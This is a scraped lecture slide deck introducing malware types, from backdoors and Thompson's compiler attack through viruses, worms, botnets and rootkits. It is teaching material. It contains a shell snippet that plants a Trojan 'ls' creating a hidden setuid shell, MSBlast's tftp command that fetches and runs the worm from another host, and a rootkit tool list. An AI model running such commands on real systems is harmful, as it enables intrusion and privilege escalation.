Upload
vernon-york
View
221
Download
1
Tags:
Embed Size (px)
Citation preview
Coming up: What is Malicious Software?
Introduction to MalwareDan FleckCS469 Security Engineering
Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop
111
What is Malicious Software?
Malicious Software (a.k.a. Malware)• Software designed to infiltrate or damage a computer system,
without the owner's informed consent -- http://en.wikipedia.org/wiki/Malware
• Examples:• Viruses, worms, Trojan horses, spyware, and other malicious and
unwanted software
• How about adware?
• Malware references the intent of the creator, rather than any particular features • DRM v.s. Rootkit (e.g., Sony CD rootkit)
2Coming up: Why should we care?
Source: Symantec Internet Threat Report 2012
2
Why should we care?
Source: Symantec Internet Threat Report 2012
3Coming up: Why should we care?
Source: Symantec Internet Threat Report 2012
3
Why should we care?
Source: Symantec Internet Threat Report 2012
4Coming up: Why should we care?
Source: Symantec Internet Threat Report 2012
4
Coming up: Taxonomy of Malicious Software
Why should we care?
Source: Symantec Internet Threat Report 2012
55
Coming up: Trapdoor/Backdoor
Taxonomy of Malicious Software
66
Coming up: Thompson's Compiler
Trapdoor/Backdoor
• Secret entry point into a system• Specific user identifier or password that
circumvents normal security procedures.• Commonly used by developers• Could be included in a compiler.
• Lets see Thompson’s Compiler
77
Nov
embe
r 1, 2
004
Coming up: The Login Program
Slide #19-
8
Thompson's Compiler• Modify the compiler so that when it compiles
login , login accepts the user's correct password or a fixed password (the same one for all users)• Then modify the compiler again, so when it
compiles a new version of the compiler, the extra code to do the first step is automatically inserted• Recompile the compiler• Delete the source containing the modification
and put the undoctored source back
88
Coming up: The Compiler
login source correct compiler login executable
user password
login source doctored compiler login executable
magic passworduser password or
logged in
logged in
The Login Program
9
Nov
embe
r 1, 2
004
Coming up: Thompson’s Lesson
Slide #19-10
compiler source correct compiler compiler executable
login source
compiler source doctored compiler compiler executable
correct login executable
login source
rigged login executable
The Compiler
1010
Coming up: Logic Bomb
Thompson’s Lesson
Verifying the source code isn’t always enough!
1111
Coming up: Trojan Horse
Logic Bomb• Embedded in legitimate programs• Activated when specified conditions met• E.g., presence/absence of some file; Particular date/time or
particular user
• When triggered, typically damages system• Modify/delete files/disks
• Example: Disgruntled employee adds trigger that when employee’s salary record deleted from DB, all personnel records deleted also.
1212Can you think of other logic bombs?
Coming up: Trojan Horse Example: NetBus
Trojan HorseProgram with an expected and hidden effect • Appears normal/expected • hidden effect violates
security policy
User tricked into executing Trojan horse • Expects (and sees) expected
behavior • Hidden effect performed
with user’s authorization
Attackercat >/homes/victim/ls <<eof cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* eof
Victimls 1313
Coming up: Virus
Trojan Horse Example: NetBus
• Designed for Windows NT system• Victim uploads and installs this• Usually disguised as a game program, or in one
• Acts as a server, accepting and executing commands for remote administrator• This includes intercepting keystrokes and
mouse motions and sending them to attacker• Also allows attacker to upload, download files
1414
Coming up: Early Virus Reports
Virus
• Program that inserts itself into one or more files and performs some action• Insertion phase is inserting itself into file• Execution phase is performing some (possibly null) action
• Self-replicating code• Generally tries to remain undetected
• Pseudocode If spread condition then
For target filesif not infected then alter to include virus
Perform malicious actionExecute normal program (step done only by Trojan horses to remain hidden)
141515
Coming up: Virus Types
Early Virus Reports
• Brain (Pakistani) virus (1986)• Written for IBM PCs• Alters boot sectors of floppies, spreads to
other floppies
• MacMag Peace virus (1987)• Written for Macintosh• Prints “universal message of peace” on March
2, 1988 and deletes itself 1616
Coming up: Virus Types
Virus TypesBoot Sector• Problem: How to ensure virus “carrier” executed?• Solution: Place in boot sector of disk• Run on any boot
• Propagate by altering boot disk creation• Less common with few boots off floppies
Executable• Malicious code placed at beginning of legitimate program (EXE or .COM• Runs when application run
15
Brain virus used this
1717
Coming up: Macro Virus Example
Virus Types
Macro Virus• Infected “executable” isn’t machine code• Relies on something “executed” inside
application data• Common example: Macros
• Otherwise similar properties to other viruses• Architecture-independent• Application-dependent
161818
Coming up: Virus Types
Macro Virus Example
• Melissa• Infected Microsoft Word 97 and Word 98 documents• Windows and Macintosh systems
• Invoked when program opens infected file• Installs itself as “open” macro and copies itself into
Normal template• This way, infects any files that are opened in future
• Invokes mail program, sends itself to everyone in user’s address book
1919
Coming up: Virus Types
Virus TypesArmored• Encrypt virus• Prevents “signature” to detect virus
Stealth• Conceal Infection• Trap read and disinfect• Let execute call infected file
Terminate and Stay Resident (TSR)• Stays active in memory after application complete• Allows infection of previously unknown files• Trap calls that execute a program 17
• Request for file length: return length of uninfected file
• Request to open file: temporarily disinfect file, and reinfect on closing
• Request to load file for execution: load infected file
2020
Coming up: Polymorphic Example
Virus TypesPolymorphic• A virus that changes its form each time it inserts itself into
another program
• Idea is to prevent signature detection by changing the “signature” or instructions used for deciphering routine
• At instruction level: substitute instructions
• At algorithm level: different algorithms to achieve the same purpose
• Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine)
172121
Coming up: Worm
Polymorphic Example
• These are different instructions (with different bit patterns) but have the same effect:• add 0 to register• subtract 0 from register• xor 0 with register• no-op
• Polymorphic virus would pick randomly from among these instructions
2222
Coming up: Work Propagation
Worm• Runs independently • Does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks• Backdoors, spam relays, DDoS agents; …
• Phases• Probing Exploitation ReplicationPayload
1823So, how is a virus different from a worm?
23
Coming up: MSBlast Worm (Aug 2003)
Work Propagation
192424
Coming up: Zombie
MSBlast Worm (Aug 2003)1. Exploits target on port 135/TCP
3. Connects to target on port 4444/TCP
5. Creates “TFTP Server” on port 696. Sends “TFTP” command to shell
8. Sends “START msblast.exe” command
10. Closes connection
2. Binds svchost.exe to port 4444/TCP via injected code
4. Creates shell “cmd.exe” and binds it to port 4444/TCP
Runs TFTP command: teleports msblast.exe file
9. Runs worm on target
11. Shell closes
tftp –l 192.168.0.1 GET msblast.exe
TCP protocal: Direction: InboundLocal end point ports: 135Application: ANYRemote End Point: ANY/ANYRule valid: ALWAYSAction: DENY
Infected New Victim
202525
Coming up: Zombie
Zombie• Secretly takes over another networked computer by exploiting
software flows• Builds the compromised computers into a zombie network or
botnet• Uses it to indirectly launch attacks• E.g., DDoS
2126
Lets see how we create zombies..
26
Coming up: Zombie: Steps - 1
Lets see how we create zombies..
Computer27
Coming up: Zombie: Steps - 2
Zombie: Steps - 1
Attacker
Unsecured Computers
Attacker scans Internet for unsecured systems that can be compromised
1
222728
Coming up: Zombie: Steps - 3
Zombie: Steps - 2
Attacker
Unsecured Computers
Attacker secretly installs zombie agentprogram, turning unsecured computers into zombies
2
232829
Coming up: Zombie: Steps - 4
Zombie: Steps - 3
Attacker
Zombies
Zombie agents “phone home” and connect to a master server
3
Master Server 242930
Coming up: Zombie: Steps - 5
Zombie: Steps - 4
Attacker
Zombies
Attacker sends commands to Maser Server to launch a DDoS attack against a targeted system
4
Master Server 253031
Coming up: Zombie: Steps - 6
Zombie: Steps - 5
Attacker
Zombies
Master server sends signal to zombies to launch attack on targeted system
5
Master Server
TARGET
263132
Coming up: Rootkit
Zombie: Steps - 6
Attacker
Zombies
Target system is overwhelmed by zombie requests denying requests from normal users
6
Master Server
TARGET
User
Requ
est
Den
ied
273233
Coming up: Linux RootKit III
Rootkit
• “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer”
• Goals:• Hide malicious resources (e.g., processes, files,
registry keys, open ports, etc.)• Provide hidden backdoor access
283334
Coming up: Rootkit
ls Trojaned! Hide filesdu Trojaned! Hide filesifconfig Trojaned! Hide sniffingnetstat Trojaned! Hide connectionschfn Trojaned! User->r00tchsh Trojaned! User->r00tinetd Trojaned! Remote accesslogin Trojaned! Remote accesspasswd Trojaned! User->r00tps Trojaned! Hide processestop Trojaned! Hide processesrshd Trojaned! Remote accesssyslogd Trojaned! Hide logslinsniffer Packet sniffer!fix File fixer!z2 Zap2 utmp/wtmp/lastlog eraser!wted wtmp/utmp editor!lled lastlog editor!bindshell port/shell type daemon!tcpd Trojaned! Hide connections, avoid denies
Linux RootKit III
293435
Coming up: Rootkit Classification
Rootkit
• Simple rootkits:• Modify user programs (ls, ps)• Detectable by tools like Tripwire
• Sophisticated rootkits:• Modify the kernel itself• Hard to detect from userland
303536
Coming up: Rootkit Classification
Rootkit Classification
31Replace apps Add code to all apps
See: http://www.phrack.org/issu
es.html?issue=62&id=12
Replace/modify kernel modules
3637
Coming up: Lessons
Rootkit Classification
32
Run entire OS in a virtual machine
3738
End of presentation
Lessons• Malware comes in many types and styles
• It’s not going away and will always hit new platforms as they come out
• We’ll need multiple approaches to defend against them.
38Next up: Malware Defense!
3839